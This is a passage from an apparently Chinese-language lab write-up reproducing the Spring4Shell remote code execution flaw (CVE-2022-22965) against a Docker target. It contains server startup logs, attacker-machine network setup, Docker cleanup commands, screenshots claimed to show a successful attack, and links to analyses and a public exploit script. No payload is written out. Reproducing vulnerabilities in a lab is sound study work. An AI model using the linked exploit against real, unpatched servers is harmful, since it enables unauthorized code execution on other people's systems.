--add-opens=java.base/java.lang=ALL-UNNAMED 17-Apr-2024 01:55:52.658 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: --add-opens=java.base/java.io=ALL-UNNAMED 17-Apr-2024 01:55:52.659 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: --add-opens=java.base/java.util=ALL-UNNAMED 17-Apr-2024 01:55:52.659 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: --add-opens=java.base/java.util.concurrent=ALL-UNNAMED 17-Apr-2024 01:55:52.660 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED 17-Apr-2024 01:55:52.660 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Djava.util.logging.config.file=/app/tomcat/conf/logging.properties 17-Apr-2024 01:55:52.661 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager 17-Apr-2024 01:55:52.662 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Djdk.tls.ephemeralDHKeySize=2048 17-Apr-2024 01:55:52.662 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Djava.protocol.handler.pkgs=org.apache.catalina.webresources 17-Apr-2024 01:55:52.663 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 17-Apr-2024 01:55:52.665 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Dignore.endorsed.dirs= 17-Apr-2024 01:55:52.665 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Dcatalina.base=/app/tomcat 17-Apr-2024 01:55:52.666 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Dcatalina.home=/app/tomcat 17-Apr-2024 01:55:52.666 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Djava.io.tmpdir=/app/tomcat/temp 17-Apr-2024 01:55:52.666 INFO [main] org.apache.catalina.core.AprLifecycleListener.lifecycleEvent The Apache Tomcat Native library which allows using OpenSSL was not found on the java.library.path: [/usr/java/packages/lib:/usr/lib64:/lib64:/lib:/usr/lib] 17-Apr-2024 01:55:52.729 INFO [main] org.apache.coyote.AbstractProtocol.init Initializing ProtocolHandler ["http-nio-8080"] 17-Apr-2024 01:55:52.788 INFO [main] org.apache.catalina.startup.Catalina.load Initialization processed in 1092 ms 17-Apr-2024 01:55:52.891 INFO [main] org.apache.catalina.core.StandardService.startInternal Starting service [Catalina] 17-Apr-2024 01:55:52.892 INFO [main] org.apache.catalina.core.StandardEngine.startInternal Starting Servlet engine: [Apache Tomcat/8.5.77] 17-Apr-2024 01:55:52.917 INFO [localhost-startStop-1] org.apache.catalina.startup.HostConfig.deployWAR Deploying web application archive [/app/tomcat/webapps/ROOT.war] 17-Apr-2024 01:55:54.681 INFO [localhost-startStop-1] org.apache.jasper.servlet.TldScanner.scanJars At least one JAR was scanned for TLDs yet contained no TLDs. Enable debug logging for this logger for a complete list of JARs that were scanned but no TLDs were found in them. Skipping unneeded JARs during scanning can improve startup time and JSP compilation time. . ____ _ __ _ _ /\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \ ( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \ \\/ ___)| |_)| | | | | || (_| | ) ) ) ) ' |____| .__|_| |_|_| |_\__, | / / / / =========|_|==============|___/=/_/_/_/ :: Spring Boot :: (v2.6.5) 2024-04-17 01:55:55.694 INFO 1 --- [ost-startStop-1] c.b.spring.core.rce.ServletInitializer : Starting ServletInitializer v0.0.1-SNAPSHOT using Java 9.0.4 on 233ab001aa5a with PID 1 (/app/tomcat/webapps/ROOT/WEB-INF/classes started by root in /) 2024-04-17 01:55:55.700 INFO 1 --- [ost-startStop-1] c.b.spring.core.rce.ServletInitializer : No active profile set, falling back to 1 default profile: "default" 2024-04-17 01:55:56.941 INFO 1 --- [ost-startStop-1] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 1103 ms 2024-04-17 01:55:57.833 INFO 1 --- [ost-startStop-1] c.b.spring.core.rce.ServletInitializer : Started ServletInitializer in 2.884 seconds (JVM running for 6.708) 17-Apr-2024 01:55:57.871 INFO [localhost-startStop-1] org.apache.catalina.startup.HostConfig.deployWAR Deployment of web application archive [/app/tomcat/webapps/ROOT.war] has finished in [4,953] ms 17-Apr-2024 01:55:57.874 INFO [main] org.apache.coyote.AbstractProtocol.start Starting ProtocolHandler ["http-nio-8080"] 17-Apr-2024 01:55:57.894 INFO [main] org.apache.catalina.startup.Catalina.start Server startup in 5105 ms 2024-04-17 01:59:00.609 INFO 1 --- [nio-8080-exec-1] o.s.web.servlet.DispatcherServlet : Initializing Servlet 'dispatcherServlet' 2024-04-17 01:59:00.615 INFO 1 --- [nio-8080-exec-1] o.s.web.servlet.DispatcherServlet : Completed initialization in 1 ms ``` # 設立攻擊端(分開攻擊與靶機) ## 區網確認 ![image](https://hackmd.io/_uploads/HyjNsgTx0.png) ``` ┌──(root㉿kali)-[/home/kali] └─# ip addr 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host noprefixroute valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc mq state UP group default qlen 1000 link/ether 06:49:30:6c:4b:f1 brd ff:ff:ff:ff:ff:ff inet 172.31.42.131/20 brd 172.31.47.255 scope global dynamic eth0 valid_lft 2347sec preferred_lft 2347sec inet6 fe80::449:30ff:fe6c:4bf1/64 scope link proto kernel_ll valid_lft forever preferred_lft forever 3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default link/ether 02:42:71:04:aa:71 brd ff:ff:ff:ff:ff:ff inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0 valid_lft forever preferred_lft forever inet6 fe80::42:71ff:fe04:aa71/64 scope link proto kernel_ll valid_lft forever preferred_lft forever 5: veth98a3814@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default link/ether c2:63:3a:71:1a:1d brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet6 fe80::c063:3aff:fe71:1a1d/64 scope link proto kernel_ll valid_lft forever preferred_lft forever ``` 成功Ping到 * * 172.31.42.131 ![image](https://hackmd.io/_uploads/B10ohgpe0.png) # 研究Code * [Spring 远程命令执行漏洞(CVE-2022-22965)原理分析和思考](https://paper.seebug.org/1877/) * [CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) (Updated)](https://unit42.paloaltonetworks.com/cve-2022-22965-springshell/) ## 重製環境 * `dcker ps`: 查看CONTAINER_ID * `docker stop <CONTAINER_ID>`: 停止docker * `docker rm <CONTAINER_ID>`: 刪除container * `docker rmi <IMAGE_ID>`: 移除映像檔 ``` ┌──(root㉿kali)-[/home/iris] └─# docker stop 884aefa286ca 884aefa286ca ┌──(root㉿kali)-[/home/iris] └─# docker rm 884aefa286ca 884aefa286ca ┌──(root㉿kali)-[/home/iris] └─# docker rmi spring-core-rce-2022-03-29:latest ``` ## 攻擊前 時間線是 2024 08:35 ![image](https://hackmd.io/_uploads/r1-3o-Te0.png) ## Ubuntu攻擊機攻擊後 時間線是2024 08:36 ![image](https://hackmd.io/_uploads/SkHPs-axC.png) * 靶機畫面,代表遠端攻擊成功 ![image](https://hackmd.io/_uploads/Hydx3ZTeA.png) # 參、相關資料 * [飛飛[漏洞分析] 002 復現 Spring4Shell: Spring Core RCE JDK 9+ CVE-2022-22965](https://feifei.tw/springshell-spring-core-rce/) * [[Day 1] - Spring Boot 是什麼](https://ithelp.ithome.com.tw/articles/10213097) * 攻擊腳本檔案 [spring-core-rce/test.py](https://github.com/dinosn/spring-core-rce/blob/main/test.py) * [Spring4shell 來襲!繼 Log4Shell 後又一 Java 生態系嚴重漏洞出現](https://www.informationsecurity.com.tw/article/article_detail.aspx?aid=9792) * [SpringCore0day/漏洞分析.pdf](https://github.com/craig/SpringCore0day/blob/main/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.pdf) ---